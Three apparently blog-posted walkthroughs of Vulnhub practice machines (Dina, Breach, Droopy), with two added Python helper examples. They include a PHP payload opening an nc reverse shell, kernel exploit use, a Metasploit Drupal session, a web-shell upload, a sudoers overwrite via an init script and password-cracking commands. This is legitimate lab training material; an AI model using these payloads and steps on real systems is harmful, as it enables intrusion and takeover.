Dina 1.0 Walkthrough – Vulnhub

Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine – so thank you Touhid!

Information Gathering

I used nmap and nikto to gather some information.

Nikto results:

+ Target IP:
+ Target Hostname: dina.lan
+ Target Port: 80
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-10-18 18:39:12 (GMT2)
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ 7444 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)
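The nikto findings above (missing security headers, an inode-leaking ETag and MultiViews answering with a TCN header) can be re-checked from any captured response. This is an added example, not part of the original post or of nikto; the sample headers are constructed to match the scan output (inode 425463 = 0x67df7, size 3618 = 0xe22, mtime made up), and the function names are my own.

```python
import re

# Constructed response headers matching the nikto output above.
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "ETag": '"67df7-e22-55bc0d5d2c900"',   # inode-size-mtime, all hex
    "TCN": "list",                          # emitted by mod_negotiation/MultiViews
    "Content-Type": "text/html",
}

# Apache's default FileETag ("INode MTime Size") yields three hex fields.
_APACHE_ETAG = re.compile(r'^(?:W/)?"?([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"?$', re.I)


def parse_apache_etag(etag):
    """Return (inode, size) when the ETag has Apache's inode-size-mtime form, else None."""
    m = _APACHE_ETAG.match(etag.strip())
    if not m:
        return None
    return int(m.group(1), 16), int(m.group(2), 16)


def audit_headers(headers):
    """Return the weaknesses a nikto-style header check would flag for one response."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name in ("x-frame-options", "x-content-type-options", "x-xss-protection"):
        if name not in h:
            findings.append(f"missing header: {name}")
    if "etag" in h:
        parsed = parse_apache_etag(h["etag"])
        if parsed:
            findings.append(f"etag leaks inode {parsed[0]} (size {parsed[1]})")
    if h.get("tcn", "").lower() == "list":
        findings.append("multiviews enabled (TCN: list)")
    return findings

# Server-side fixes for these findings (Apache directives):
#   FileETag MTime Size            -> drops the inode from the ETag
#   Options -MultiViews -Indexes   -> no content negotiation, no directory listing
#   Header always set X-Frame-Options "DENY" (and the other two headers likewise)
```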

Nmap result:

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina

I have checked all paths above and found some interesting strings on /nothing. Found the following strings in the comment of the source code:

#my secret pass

It looks like we found some passwords. Nice. Let’s check the other path: /secure. It contains a password-protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin

OK, let’s check that secret SMS gateway. I tried to log in with the username touhid and the passwords found earlier. The working login pair was touhid:diana.

The first thing I usually do when I identify a web application is to check exploit-db for available exploits.

PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
PlaySms - Remote File Inclusion | php/webapps/17792.txt
PlaySms - Cross-Site Request Forgery | php/webapps/30177.txt

This is all I need. Touhid did a great job finding the vulnerabilities in this application. There are at least 3 different ways to run system commands through the PHP system() function.

All right, it’s time to get a remote shell.

Gaining remote shell

I tried to run system commands as described in 42044.txt. I tried a lot; a simple nc host port -e /bin/bash didn’t work because this netcat was the OpenBSD version, and the “-e” option is missing from the OpenBSD version. After a few minutes of research I created a CSV file with the following content:

<?php $cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3

Luckily I got shell!!!

Privilege escalation

Running whoami told me that my current user is www-data. Okay, let’s check the system. Running netstat -tlpn showed that a MySQL server is running on this machine. In the SecreTSMSgatwayLogin directory there was a config.php file. I checked this file and found the login and password pair for the database.


Then I selected the playsms database and found the user table and the password hashes:

MySQL hashes:

| admin_78f3198ce97ae2bdddb15cc25d559c6f |
| touhid_3a23bb515e06d0e944ff916e79a7775c |

The findmyhash command didn’t find the password in the public databases. I was too lazy to fire up oclHashcat and brute-force the hash, so I moved on.

I could not get higher privileges through the MySQL system command, so I looked for another way to get root access.

cat /etc/*-release:


Okay, let’s invite our dirty friend….


I am too lazy…. Really… At this point I knew what to use…. I’ve got a little experience from earlier vulnhub machines and used the following exploit from exploit-db to enumerate privileges: 40839.c
I was lucky: gcc was present on that machine and the exploit compiled without errors.

./exploit 1234

After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.

firefart@Dina:/# cat /root/flag.txt
cat /root/flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))

root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….

FLAG : 22d06624cd604a0626eb5a2992a6f2e6

Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.


Vulnhub – Breach 1.0 walkthrough

First let’s see what we got. I did a basic nmap scan:


It seems that an active IPS/IDS is present. I tried different nmap evasion techniques, but those didn’t work; it said that all ports were filtered. I checked manually whether port 80 was open, then I fired up Nikto: nothing interesting.


Let’s look at those images. Voilà, a little hint:


Okay, let’s check that source code. I found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or an encoded string. I don’t know why, but my first thought was that it was a base64-encoded string. I had to decode the string twice, and that gave me a username:password pair.
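A small helper for the double-encoding just described, added here as an example and not part of the original post: it pulls the token out of the HTML comment copied from above and peels base64 layers until the result is no longer base64, stopping on non-printable output so binary blobs are not mangled. The function names are my own.

```python
import base64
import binascii
import re

# The HTML comment quoted in the walkthrough above.
HTML_COMMENT = "<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->"

_B64_BODY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_comment_payload(html):
    """Return the opaque token inside an HTML comment, ignoring surrounding dashes/whitespace."""
    m = re.search(r"<!--+\s*([A-Za-z0-9+/=]+)\s*-+>", html)
    return m.group(1) if m else None


def looks_like_base64(s):
    """Strict test: base64 alphabet, length a multiple of 4, and exact round-trip."""
    if len(s) % 4 or not _B64_BODY.match(s):
        return False
    try:
        return base64.b64encode(base64.b64decode(s, validate=True)).decode() == s
    except (binascii.Error, ValueError):
        return False


def peel_base64(token, max_layers=8):
    """Decode repeatedly while the text is still base64; return (layers_removed, final_text).

    Stops when a layer decodes to non-ASCII or non-printable bytes, so a short
    word that merely looks like base64 (e.g. "cafe") is left untouched.
    """
    text, layers = token, 0
    while layers < max_layers and looks_like_base64(text):
        raw = base64.b64decode(text, validate=True)
        try:
            candidate = raw.decode("ascii")
        except UnicodeDecodeError:
            break
        if not candidate.isprintable():
            break
        text, layers = candidate, layers + 1
    return layers, text
```

Running peel_base64 on the extracted token reports two layers, matching the two decodes the post describes.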


I did some investigation and found a CMS portal called ImpressCMS (I clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in the inbox. Let’s see the first:


I downloaded the keyfile located at the root of the website and found out that it is a Java keystore file. I read the 2 other messages, but those didn’t help me much. My first thought proved itself: an active IDS/IPS is present. I searched for exploits related to ImpressCMS, but the ones that could have worked were trolled:


At this point I got stuck a bit. I tried dirbuster, different exploits and XSS vulnerabilities on the CMS site, but nothing. I tried to brute-force the admin account, but no luck. I investigated the other pictures and pages deeper; nothing interesting. One option was left on the CMS site: check pgibbons’ profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

I opened the pcap file; it contained data, but I didn’t have a private RSA key to decrypt it. WAIT! I have one! I had to export the RSA private key from .keyfile, and then I was able to look at what the heck happened:


Tomcat Manager was running on port 8443 ( | login successful with the Wireshark credentials). What’s more, the Wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where is it? It had been uploaded, but the resource cannot be found; the author or a system service may have deleted it. A little googling helped me at this part. I can upload any kind of WAR file, and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my Kali box.



First I tried some Ubuntu 14.04-based kernel exploits, but all of them failed. Finally I gave up probing exploits; instead I sent the LinEnum privilege checker to the victim machine and did a quick investigation of what permissions I had.

MySQL login was successful without a password with the username root. Nice. I found Milton’s username and password hash in the database, then tried to crack the password with oclHashcat. It was successfully recovered, so I tried to change my user from tomcat to milton. It was successful. Another username and password were found, but I couldn’t crack this hash within a reasonable time.


After changing user from tomcat to milton I found a “some_script.sh” file with the following content: Nothing here.

Okay, dig deeper. Really. Nothing in here…. After some time I found an init script in the init.d folder (portly.sh). This little script redirects all traffic to the portly scanner. Okay, I will use this script to add milton to the sudoers at system startup.

echo 'echo "milton ALL=(ALL) ALL" > /etc/sudoers' > /etc/init.d/portly.sh

After the system reboot I rebuilt my connections, did a quick sudo su as milton and voilà, I captured the flag.


Vulnhub – Droopy: v0.2


This is a quick post about how to hack this vulnerable virtual machine found on the Vulnhub website. Just to be clear, I am not a security professional; I am just learning and preparing myself for the OSCP exam. If you find any mistake, please let me know.


First we do some network discovery with netdiscover:


We see that the host is at Let’s do an nmap scan:

nmap -sS -A -O -vv -Pn > nmap.txt

80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

Nmap shows that on this machine there is a website hosted by an Apache web server, and Drupal is running on it. I investigated the site and it requires a login and password. Fire up the Metasploit Framework and let’s do a quick check to find an exploit suitable for our victim. Because Drupal uses a MySQL database, it’s quite trivial that a SQL injection could work.


I chose the third one, fingers crossed. Boom, we have a Meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
— —-
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on
[*] – Testing page
[*] – Creating new user SsozXsiTZb:UldknxsZnY
[*] – Logging in as SsozXsiTZb:UldknxsZnY
[*] – Trying to parse enabled modules
[*] – Enabling the PHP filter module
[*] – Setting permissions for PHP filter module
[*] – Getting tokens from create new article page
[*] – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to
[*] Meterpreter session 9 opened ( -> at 2016-04-19 11:06:36 +0200

meterpreter >

Nice news; let’s look around and get information out of the system. I used the sysinfo command, let’s see what it is.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I’ll try my luck and check whether this machine is vulnerable to the overlayfs vulnerability, what user permissions I have, and whether I am able to compile my exploit with gcc and run it.

First transfer the exploit to the /tmp folder with Meterpreter’s upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami

Nice, we have root access to the system, so let’s find the flag. Usually the flag is in the root directory, so let’s see what we have.


Dave.tc? Wut? After googling a bit I found that the .tc extension could be a TrueCrypt password-protected file. Google says that TrueCrypt is discontinued and that password-protected volumes can be cracked with the proper program and a good dictionary. My first thought was oclHashcat because I have an AMD card, and truecrack in Kali Linux supports Nvidia cards (only?). I didn’t research whether it supports AMD too, because I am happy with oclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have the rockyou wordlist, so let’s check /var/mail:


Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

Exhausted. Nothing. Several hours later, still nothing. I tried to apply rules (best64) and different dictionaries; nothing. The last sentence could also be a hint, so I did a dictionary combination attack (I downloaded lyrics from The Jam, made a dictionary from them and combined it with rockyou). Still no luck. Will I fail at this point? It was so easy until now. TRY HARDER! So I took a break, and when I sat in front of my computer again I had a clue. What if I was trying with the wrong hashing algorithm? Some guys on the hashcat forums mentioned that I should try the SHA512 algorithm instead of RIPEMD-160. Okay, fire up oclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

After a couple of minutes it finished. Cracked. Okay, let’s install TrueCrypt and check what we got. When it prompted for the password I tried copy/paste and….. Wrong password. OMG, what’s happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted as drive H:


Let’s check out this drive. Nothing interesting: some jpg files and a .secret folder. HMMM!

I opened this one and under the .top folder I captured the flag.


This was quite fun! Thank you!